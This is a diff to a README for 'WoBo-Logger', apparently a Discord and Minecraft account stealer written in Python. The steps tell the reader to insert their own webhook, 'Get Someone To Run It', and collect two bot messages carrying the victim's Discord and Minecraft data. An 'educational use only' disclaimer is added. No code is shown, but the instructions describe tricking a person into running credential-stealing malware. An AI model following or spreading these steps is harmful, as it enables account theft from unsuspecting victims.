WoBo-wow/WoBo-Logger/README.md

 - Step 1:    Download the .py file
 - Step 2:    Open It Using A Python Editor

-- Step 3:  Change "Your Webhook Here" To Your Webhook
+- Step 3:    Change both the  "Your Webhook Here" To Your Webhook
 - Step 4:    Get Someone To Run It
+- Step 5:    You Should Get 2 Messages From The Bot One For Discord And One For Mc

 - ✨Magic!✨

+## Disclaimer
+>I Am Not Responsible For Anything Bad
+You Do With This It Is Simply For
+Educational Use Only.